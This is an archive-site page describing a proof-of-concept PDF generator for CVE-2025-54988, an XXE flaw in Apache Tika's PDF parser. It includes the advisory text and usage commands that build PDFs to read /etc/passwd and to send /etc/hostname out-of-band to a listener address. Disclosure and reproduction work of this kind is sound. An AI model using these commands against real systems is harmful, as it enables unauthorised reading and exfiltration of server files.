Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-54988 PoC — Apache Tika PDF parser module: XXE vulnerability in PDFParser's handling of XFA

Source
https://github.com/mgthuramoemyint/POC-CVE-2025-54988
Associated Vulnerability
Title:Apache Tika PDF parser module: XXE vulnerability in PDFParser's handling of XFA (CVE-2025-54988)
Description:Critical XXE in Apache Tika (tika-parser-pdf-module) in Apache Tika 1.13 through and including 3.2.1 on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. An attacker may be able to read sensitive data or trigger malicious requests to internal resources or third-party servers. Note that the tika-parser-pdf-module is used as a dependency in several Tika packages including at least: tika-parsers-standard-modules, tika-parsers-standard-package, tika-app, tika-grpc and tika-server-standard. Users are recommended to upgrade to version 3.2.2, which fixes this issue.
Description
A PDF generator for CVE-2025-54988
Readme
# CVE-2025-54988 - POC
Disclaimer: I am not the original discoverer of this vulnerability. This post documents my process of reproducing the issue in a controlled environment for educational purposes and to help others validate their own systems.
The tests were conducted in an isolated lab with no impact to production systems.

Usage: 

```
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
```

<img width="1845" height="719" alt="image" src="https://github.com/user-attachments/assets/fb7f27a8-28c8-4131-b27e-25ccab0af838" />
File Snapshot

 [4.0K]  /data/pocs/34fb2b52b2daff87fc813705bcc409f4dbcc89dd
├── [ 749]  README.md
├── [1010]  xfa_passwd.pdf
└── [5.9K]  xfa_xxe_poc_gen.py

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →